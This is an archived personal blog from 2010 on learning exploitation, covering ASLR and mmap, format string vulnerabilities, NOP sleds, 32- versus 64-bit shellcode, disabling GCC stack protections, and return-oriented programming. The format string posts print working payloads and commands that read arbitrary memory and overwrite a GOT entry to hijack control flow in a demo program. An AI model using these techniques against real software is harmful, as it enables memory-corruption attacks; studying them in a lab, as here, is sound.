Archive for September, 2010

ASLR, Dynamic Linkers, & Mmap

Well I had hoped to learn more about Address Space Layout Randomization (ASLR) and blog about it after reading “On the Effectiveness of Address-Space Layout Randomization.” I got about a quarter of the way through the paper and realized that I need to better understand address space layout in general. Where is libc in memory and how do programs get access to it?

I’ve been Googling and reading for the last 3.5 hours and am somewhat more informed but I’m still trying to figure it all out.

Every dynamically linked ELF executable on Linux invokes the dynamic linker, which is the bootstrap for finding and loading all of the shared libraries (.so extensions) the program needs. I think that the linker uses mmap() to memory map the shared libraries from the disk into the process’s virtual address space but I’m still somewhat confused on this part.

Mmap was another thing I wasn’t familiar with. Memory mapped files essentially allow a program to refer to a file as if it were in memory, with the kernel paging page sized chunks of the file into memory as they are touched. For writing files, it has the advantage that many small writes happen in memory and then the virtual memory manager writes the whole page to disk at once. I’m still trying to figure out what the advantage of mmap’ing shared libraries is. For shared libraries, mmap is used to map the library into the process’s address space as if the process contained the library in its own memory. According to what I read, mmap can be used to map “shared memory objects” as well as files, etc. Basically anything that has a file descriptor can be memory mapped.
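To make the idea concrete for myself, here is a minimal Python 3 sketch of reading a file through a memory mapping. The scratch file and the helper names (read_via_mmap, demo) are made up for illustration; it only shows the general mmap idea, not what the dynamic linker actually does.

```python
import mmap
import os
import tempfile


def read_via_mmap(path, offset, length):
    """Return `length` bytes starting at `offset`, read through a memory mapping."""
    with open(path, "rb") as f:
        # Length 0 maps the whole file; ACCESS_READ makes the mapping read-only.
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mapped:
            # Slicing the mapping looks like ordinary memory access; the
            # kernel pages the file data in behind the scenes.
            return mapped[offset:offset + length]


def demo():
    # Hypothetical scratch file standing in for a shared library on disk.
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(b"\x7fELF" + b"\x00" * 4096)
        return read_via_mmap(path, 0, 4)
    finally:
        os.remove(path)


print(demo())
```

The program never calls read() on the file; it just indexes into the mapping as if it were a byte string.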

I’m wondering if the operating system loads very common and essential libraries like glibc into physical memory and then mmap’s them into the process’s virtual address space or if it memory maps the actual file on disk like I mentioned above (i.e. /usr/lib/
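One way to poke at this question on Linux is to look at /proc/<pid>/maps, which lists every mapping in a process along with the file backing it. Below is a small Python 3 sketch that parses one line of that file. The sample line is made up for illustration (the addresses, inode, and library path are assumptions, not output from my machine), and the helper names are my own.

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into its fields."""
    # Format: start-end perms offset dev inode [pathname]
    fields = line.split(None, 5)
    start, end = (int(part, 16) for part in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""
    return {
        "start": start,
        "end": end,
        "perms": fields[1],
        "offset": int(fields[2], 16),
        "path": path,
    }


def library_mappings(name, maps_path="/proc/self/maps"):
    """Return the mappings of the current process whose path contains `name` (Linux only)."""
    with open(maps_path) as f:
        return [m for m in map(parse_maps_line, f) if name in m["path"]]


# Hypothetical sample line, only for illustration.
SAMPLE = "b7e5c000-b7fb0000 r-xp 00000000 08:01 131085     /lib/libc-2.11.1.so"

entry = parse_maps_line(SAMPLE)
print(hex(entry["start"]), entry["perms"], entry["path"])
```

On a Linux box, library_mappings("libc") should show which file on disk backs each libc mapping and at what address it landed for that run.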

So far the best material I’ve found related to these subjects was

and one that looks good but I haven’t had a chance to read yet this one is especially good:

Format String Vulnerabilities: Part 2

In part one of Format String Vulnerabilities I showed you some simple code with a very serious format string vulnerability. I showed you how you could exploit this vulnerability to read any part of memory. In section two, I’m going to show you how you can write to any address in memory!

Writing to Memory

Exploiting format string vulnerabilities is all about providing input with a format character that expects its argument to be passed by reference, where you control that reference. I used ‘%s’ to read from memory. I’m going to use %n to write to memory.

%n	      Number of characters written by this printf.

Lucky for us, there is a really easy way to control the number of characters written by printf. When you specify a format character, you can optionally give it an integer for the width of the format character.

%<N>x	      Pad the output to a minimum width of N characters.

We can use this to control how many characters are written by printf.

If you’re following at this point, you’re probably wondering how we’re going to use %n to write to memory. We can use %n to write a 4 byte value of our choosing to a target address one byte at a time.

We write the lowest order byte first and then shift the target address up by a byte for each following write, using width padding to control the integer value written each time.

Target = 0xAAAA1111
0xAAAA1111 = <int>
0xAAAA1112 = <int>
0xAAAA1113 = <int>
0xAAAA1114 = <int>
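The arithmetic behind the four writes can be sketched in Python 3. This is only my own illustration of the padding math: the function name, the assumption that 16 characters (four 4 byte addresses) have already been printed, and the example value 0xDDCCBBAA are all made up. Since %n writes the running count of characters, each byte only needs to be correct modulo 256.

```python
MIN_WIDTH = 8  # %x can print up to 8 hex digits, so smaller widths are not reliable


def byte_write_widths(value, already_written):
    """Return the %<width>x padding needed before each of the four %n writes."""
    widths = []
    written = already_written
    for i in range(4):
        target = (value >> (8 * i)) & 0xFF      # low order byte first
        pad = (target - written) % 256          # only the low byte of the count matters
        if pad < MIN_WIDTH:
            pad += 256                          # wrap around to keep the width usable
        widths.append(pad)
        written += pad
    return widths


print(byte_write_widths(0xDDCCBBAA, 16))
```

Each later write also spills its higher bytes into the following addresses, which is why the writes go from the lowest address to the highest.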

If we can overwrite an address that the program later jumps to, we can control the flow of execution. Let’s overwrite the address of printf! First we need to find where the address for printf is stored (its relocation entry):

nobody@nobody:~$ objdump -R ./text_to_print
08049660 R_386_JUMP_SLOT   printf

Next we need to craft a string to overwrite this address using %n and width padding. We’ll also use printf’s ability to argument swap:

One can also specify explicitly which argument is taken
by writing '%m$' instead of '%'

Lastly, instead of writing a byte at a time, we can use printf’s ‘length modifier’ to tell printf what type it’s writing %n to. We’ll use ‘l’ (ell) so that %n writes a long int.

0x0000beef seems like a good address to overwrite printf with since everyone loves beef! Our input will be a 4 byte address (to printf) and the decimal value of beef – 4 (to accommodate the length of the address) = 48875.
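The same calculation as a Python 3 sketch, in case the numbers are easier to follow in code. The function name and parameters are my own; it assumes a 32 bit little-endian target and that the address is the only thing printed before the padding.

```python
import struct


def build_write_payload(target_addr, value, arg_index):
    """Build <address><%WIDTHx><%INDEX$ln> so that %n stores `value` at `target_addr`."""
    address = struct.pack("<I", target_addr)    # 4 bytes, little-endian
    width = value - len(address)                # the address bytes are already counted
    if width <= 0:
        raise ValueError("value is too small for this simple layout")
    directive = "%{}x%{}$ln".format(width, arg_index)
    return address + directive.encode("ascii")


payload = build_write_payload(0x08049660, 0xBEEF, 4)
print(payload)
```

Here 0xbeef is 48879 in decimal, and subtracting the 4 address bytes gives the 48875 used as the width.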

Here’s what it looks like when we run it (note we have to escape the $ with a \ for the shell):

nobody@nobody:~$ ./text_to_print $(python -c 'print "\x60\x96\x04\x08"')%48875x%4\$ln

Program received signal SIGSEGV, Segmentation fault.
0x0000beef in ?? ()

You can see that the program tried to jump to 0x0000beef and crashed! Be sure to check out the full section on format string vulnerabilities in Hacking: The Art of Exploitation, it talks all about these techniques and more.

Disable VirtualBox Menu Bar OSX

I frequently use Linux in VirtualBox as a testing and hacking environment. It got really annoying when I would go to the Gnome menu bar and the OSX Menu bar would pop up overtop of the Gnome menu bar!

Luckily, the guys (or gals) over at Eternal Storms Software have an awesome app called PresentYourApps. Once you’ve installed it, set VirtualBox VM to “Remove Menu Bar and Dock”

Then, restart VirtualBox — no more Menu Bar!

Format String Vulnerabilities: Part 1

I have to admit that I’ve heard of format string vulnerabilities but I never knew exactly what they were. After reading about them in Hacking: The Art of Exploitation I’m surprised I didn’t know more about them since they are extremely dangerous! Take this code for instance:

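#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(EXIT_FAILURE);
   }
   strncpy(text, argv[1], 1024);
   text[1023] = '\0';   /* strncpy does not terminate a full buffer */

   printf(text);        /* vulnerable: user input is used as the format string */
   printf("\n");

   return EXIT_SUCCESS;
}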

Normal usage would look like this:

nobody@nobody:~$ ./text_to_print "Hello World!"
Hello World!

Looks harmless, right? It’s not! This code is very vulnerable to a format string attack. The problem is that the call to printf should have been:

 printf("%s", text);

Why does it matter? Well, the way that printf works is that all of the variable arguments for the format string are pushed onto the stack in reverse order. Printf then parses the format string until it reaches a format character and references the argument on the stack based on the index of the format character.

If we specially craft the input to contain format characters, printf will mistakenly reference whatever values happen to be on the stack. We can use this to effectively read the stack. For instance:

nobody@nobody:~$ ./text_to_print "AAAA %x %x %x %x"
AAAA bffff9ba 3f0 0 41414141

It gets better though! The previous stack frame before printf is called contains the string argument passed to printf. Did you notice in the output above, the last ‘%x’ printed the first ‘AAAA’?

We can use this to read the contents of any memory address by putting the address we want to read at the start of the string, followed by three ‘%08x’ format characters to step past 3 stack positions (each 4 byte value is printed as 8 hex digits), and then putting a ‘%s’ format character at the 4th position to read our address. Like this:

nobody@nobody:~$ ./text_to_print $(printf "\x34\xf8\xff\xbf")%08x%08x%08x%s

or with Python like this (the ‘+’ is used to separate the values for readability):

nobody@nobody:~$ ./text_to_print $(printf "\x34\xf8\xff\xbf")$(python -c 'print "%08x+"*3')%s

00000000 is the contents of address 0xbffff834!
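For reference, here is a small Python 3 sketch that builds the same read payload. The function name and the skip parameter are my own, and it assumes a 32 bit little-endian target where the start of the string shows up at the 4th stack position, as in the example above.

```python
import struct


def build_read_payload(addr, skip):
    """Build <address> + skip * '%08x' + '%s' to read the string stored at `addr`."""
    address = struct.pack("<I", addr)     # little-endian, so 0xbffff834 -> 34 f8 ff bf
    return address + b"%08x" * skip + b"%s"


print(build_read_payload(0xBFFFF834, 3))
```

The number of ‘%08x’ entries depends on how far the string sits from printf’s arguments, so on another build the skip count would probably differ.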

More to come on using format string vulnerabilities to write to any place in memory in Part Two of Format String Vulnerabilities!

Flow of a Buffer Overflow Payload

Here is the flow of a buffer overflow payload with a NOP Sled.

  1. Jump to overwritten return address that (hopefully) points to somewhere in the NOPs (0x90)
  2. Consume the No Operations (NOPs)
  3. Execute the shell code
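The layout of a payload that follows this flow can be sketched in Python 3. This is my own illustration under a few assumptions: a 32 bit little-endian target, a sled + shellcode + repeated return address layout, a made-up return address, and placeholder bytes (0xcc breakpoints) instead of real shellcode.

```python
import struct

NOP = b"\x90"


def build_overflow_payload(shellcode, sled_len, ret_addr, ret_copies):
    """Lay out the payload as [NOP sled][shellcode][return address repeated]."""
    sled = NOP * sled_len
    # Repeating the address raises the odds that one copy lands on the saved return address.
    returns = struct.pack("<I", ret_addr) * ret_copies
    return sled + shellcode + returns


PLACEHOLDER_SHELLCODE = b"\xcc" * 4    # hypothetical stand-in, not a working shell
HYPOTHETICAL_RET = 0xBFFFF6F0          # assumed address somewhere inside the sled

payload = build_overflow_payload(PLACEHOLDER_SHELLCODE, 16, HYPOTHETICAL_RET, 3)
print(len(payload), payload.hex())
```

The longer the sled, the less precise the guessed return address has to be.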


Trouble Spawning a Shell

I’ve been working on some of the examples out of the Hacking: The Art of Exploitation book which exploit a program with shellcode but I’m not having much luck. The exploit makes sense conceptually but I can’t get it to spawn the shellcode.

It uses the system() function to invoke the exploitable program from the shell with the payload as a commandline arg. I want to look at the stack in GDB of the command being invoked by the system() function … does anyone know how to do this or know if it’s even possible?

It’s possible for me to look at the stack when I pass the arguments myself from the commandline but the system() function is doing it instead because it’s easier to construct the shellcode programmatically.

I also looked at the return value of the system() function and it’s zero, meaning that the program exited normally. I’m curious if somehow the command payload isn’t getting passed correctly so I was hoping to look at the stack…

My problems were related to trying to execute the exploit on a 64-bit system when the code was developed for 32-bit. After switching over to a 32-bit OS, I was able to spawn a shell no problem!

32 bit vs 64 bit exploitation

The exploit code in Hacking: The Art of Exploitation is targeted towards overwriting 32 bit return addresses (size 4). It uses code like this:

unsigned int ret;
ret = (unsigned int) &var;   /* the address fits in 4 bytes on a 32 bit system */
*((unsigned int *)(buffer+sizeof(unsigned int))) = ret;

I’m working on a 64 bit machine and thus my addresses are double in size. I’m guessing this means that the above code won’t work on my machine (I’m not sure?). I searched around and found an “unsigned integer pointer type” which is defined per architecture and it is indeed size 8 on my 64 bit machine. I changed the code to this:

uintptr_t ret;   /* from <stdint.h> */
ret = (uintptr_t) &var;
*((uintptr_t *)(buffer+sizeof(uintptr_t))) = ret;

I thought that this was the reason I was having trouble spawning a shell from shellcode but after changing the code it still doesn’t spawn a shell.
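The size difference is easy to see when packing addresses in Python 3. This is just a sketch with a helper name of my own, and both example addresses are made up.

```python
import struct


def pack_address(addr, bits):
    """Pack an address as a little-endian 32 bit or 64 bit value."""
    fmt = {32: "<I", 64: "<Q"}[bits]
    return struct.pack(fmt, addr)


STACK_ADDR_32 = 0xBFFFF834          # hypothetical 32 bit stack address
STACK_ADDR_64 = 0x7FFFFFFFE4D0      # hypothetical 64 bit stack address

print(len(pack_address(STACK_ADDR_32, 32)))   # 4 bytes
print(len(pack_address(STACK_ADDR_64, 64)))   # 8 bytes

try:
    pack_address(STACK_ADDR_64, 32)
except struct.error as exc:
    # A 64 bit address simply does not fit in an unsigned int.
    print("does not fit:", exc)
```

Notice that the 64 bit address also contains zero bytes in its upper half, which is a problem for payloads copied with string functions like strcpy.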

Not only do I think the return addresses are going to be different between 64 bit and 32 bit but they’ve totally changed the syscall numbers in “unistd.h”. That means that this shellcode isn’t going to work at all on 64-bit because it assumes ‘execve’ is 11.

; execve(const char *filename, char *const argv [], char *const envp[])
  push BYTE 11      ; push 11 to the stack
  pop eax           ; pop dword of 11 into eax
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

On 64 bit, 11 is ‘munmap’

#define __NR_munmap                             11
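To keep the two numbering schemes straight, here is a tiny Python 3 lookup table with a handful of entries from each architecture’s syscall table. It is only a partial sketch: the dictionary and helper names are my own and just a few syscalls are listed.

```python
# A few syscall numbers from the 32 bit x86 and x86_64 Linux tables.
SYSCALLS = {
    "i386":   {"exit": 1,  "write": 4, "execve": 11, "munmap": 91},
    "x86_64": {"exit": 60, "write": 1, "execve": 59, "munmap": 11},
}


def name_for(arch, number):
    """Return the syscall name for `number` on `arch`, or None if it is not in this partial table."""
    for name, value in SYSCALLS[arch].items():
        if value == number:
            return name
    return None


print(name_for("i386", 11))     # execve
print(name_for("x86_64", 11))   # munmap
```

So shellcode written for one table needs its syscall numbers changed before it has a chance of working with the other.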

Looks like I’ll definitely be installing a 32 bit version of Linux in order to follow along with the examples, 64 bit is going to be too challenging while I’m in the learning stage.

Quickly Use BC to Convert Hex to Dec

This post is mainly for my own benefit because I’ll forget this if I don’t put it down somewhere. A lot of the time I need to convert hex to dec when I’m on the command line and it’s a pain to open up the calculator, so here is the command line equivalent (bc expects the hex digits in upper case):

echo "ibase=16; FFFF" | bc
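If Python 3 is handy, the same conversion is a one-liner there too. The helper name is my own.

```python
def hex_to_dec(text):
    """Convert a hex string (with or without a 0x prefix, any case) to an integer."""
    return int(text, 16)


print(hex_to_dec("FFFF"))     # 65535
print(hex_to_dec("0xbeef"))   # 48879
```

Unlike bc, int() accepts lower case digits and an optional 0x prefix.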

Turning off buffer overflow protections in GCC

As I’m learning more and more about exploiting buffer overflows I’m realizing that it’s actually pretty hard to run the examples that teach you how to exploit buffer overflows. GCC (and other compilers) have built in support for mitigating the simple buffer overflows and it’s turned on by default.

With GCC you have to compile with the -fno-stack-protector option, otherwise you get “***stack smashing detected***”. This is pretty well known and documented all over the net.

However, additionally you’ll need to disable the FORTIFY_SOURCE option otherwise you’ll get “Abort trap” if you try to do a buffer overflow that uses something like strcpy or memcpy.

To disable it, simply compile with the flag -D_FORTIFY_SOURCE=0 (e.g. gcc -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -o overflow_example overflow_example.c)

FORTIFY_SOURCE is enabled by default on a lot of Unix like OSes today. Its original development dates back almost 6 years but I don’t think it was turned on by default until recently (within the past 2 years).

#  else
#    define _FORTIFY_SOURCE 2	/* on by default */
#  endif

That means that when you include something like “string.h”, at the bottom of “string.h” is the following (at least on Mac OS X 10.6):

#if defined (__GNUC__) && _FORTIFY_SOURCE > 0 && !defined (__cplusplus)
/* Security checking functions.  */
#include <secure/_string.h>

So when you compile, instead of seeing a call to strcpy

0x0000000100000d50 <main+188>:  lea    rdi,[rbp-0x20]
0x0000000100000d54 <main+192>:  call   0x100000dba <dyld_stub_strcpy>
0x0000000100000d59 <main+197>:  lea    rdx,[rbp-0x20]

you’ll see a call to the strcpy_chk function in your disassembled code

0x0000000100000d50 <main+192>:  mov    edx,0x8
0x0000000100000d55 <main+197>:  call   0x100000daa <dyld_stub___strcpy_chk>
0x0000000100000d5a <main+202>:  lea    rdx,[rbp-0x20]
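Conceptually, the checked version just gets the destination size as an extra argument and aborts instead of overflowing. Here is a rough Python 3 model of that idea. It is only a sketch of the behavior, not the actual library implementation, and the exception and function names are my own.

```python
class BufferOverflowDetected(Exception):
    """Stands in for the abort that the checked function triggers."""


def strcpy_chk(dest, src, dest_size):
    """Copy `src` plus a terminating NUL into `dest`, refusing if it would not fit."""
    needed = len(src) + 1                      # +1 for the terminating NUL byte
    if needed > dest_size:
        raise BufferOverflowDetected(
            "copy of %d bytes into a %d byte buffer" % (needed, dest_size))
    dest[:needed] = src + b"\x00"
    return dest


buf = bytearray(8)
print(strcpy_chk(buf, b"short", len(buf)))

try:
    strcpy_chk(bytearray(8), b"A" * 32, 8)
except BufferOverflowDetected as exc:
    print("aborted:", exc)
```

With the check in place the oversized copy never reaches the saved return address, which is why the simple examples stop working.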

This will wreak havoc on any of your simple buffer overflow exploiting examples so make sure you disable it when you compile. Happy exploiting!

Adobe PDF Return Oriented Exploit

The news just keeps getting worse for Adobe. After releasing an out-of-band patch for their other 0-day PDF exploit used to jailbreak the iPhone, the people at McAfee discovered malware in the wild exploiting another 0-day PDF exploit. Apparently this exploit takes advantage of your typical buffer overflow exploit (come on Adobe!) but the way it’s exploited is very interesting; it uses return oriented programming.

Return Oriented Exploitation

This is a very clever exploitation technique that gets around many of the usual countermeasures against exploitation of overflows, such as ASLR, compiler stack protection, and non-executable memory regions. It essentially works by using code that already exists in the process’s memory, such as library routines at well known locations (not everything is randomized), as building blocks for executing code. The key is that every “building block” must end in a RET instruction, hence the name return oriented.

Suppose after scanning memory we found the following useful “building blocks” (commented for understanding):

Block 1
	mov	ebx,0x01 # fd = stdout
	ret
Block 2
	mov	ecx,msg # Some msg (e.g. Hello World)
	mov	edx,len # len of msg
	ret
Block 3
	mov	eax,0x04 # write syscall
	int	0x80
	ret

You could construct each of these “building blocks” in reverse order such that the RET address jumped from one block to the next, in essence executing the following code:

	mov	ebx,0x01 # fd = stdout
	mov	ecx,msg # Some msg (e.g. Hello World)
	mov	edx,len # len of msg
	mov	eax,0x04 #write syscall
	int	0x80

Your exploit would print “Hello World” to standard out at this point (not much of an exploit!).
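The chaining can be modelled with a toy simulation in Python 3. Everything here is made up for illustration: the gadget addresses, the register dictionary, and the way the write syscall is faked. It only shows how a list of return addresses on the stack strings the blocks together.

```python
MSG = "Hello World"


def block1(regs):
    regs["ebx"] = 1                 # fd = stdout


def block2(regs):
    regs["ecx"] = MSG               # pointer to the message
    regs["edx"] = len(MSG)          # length of the message


def block3(regs):
    regs["eax"] = 4                 # write syscall number on 32 bit Linux
    # Stand-in for `int 0x80`: act on whatever the registers describe.
    if regs["eax"] == 4 and regs["ebx"] == 1:
        regs["output"] = regs["ecx"][:regs["edx"]]


# Hypothetical addresses where the blocks were "found" in memory.
GADGETS = {0x08048100: block1, 0x08048200: block2, 0x08048300: block3}


def run_chain(stack):
    """Run each block in turn; every RET pops the next address off the stack."""
    regs = {}
    pending = list(stack)
    while pending:
        next_addr = pending.pop(0)  # what RET does: pop an address and jump to it
        GADGETS[next_addr](regs)
    return regs


CHAIN = [0x08048100, 0x08048200, 0x08048300]
print(run_chain(CHAIN)["output"])
```

The attacker never injects code in this model; the overflow only supplies the list of addresses.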

These types of exploitation techniques seem very hard to defend against. I’d be interested to see what mitigation techniques they’ll come up with to defend against this! For more info on Return Oriented Exploitation, check out an excellent presentation at
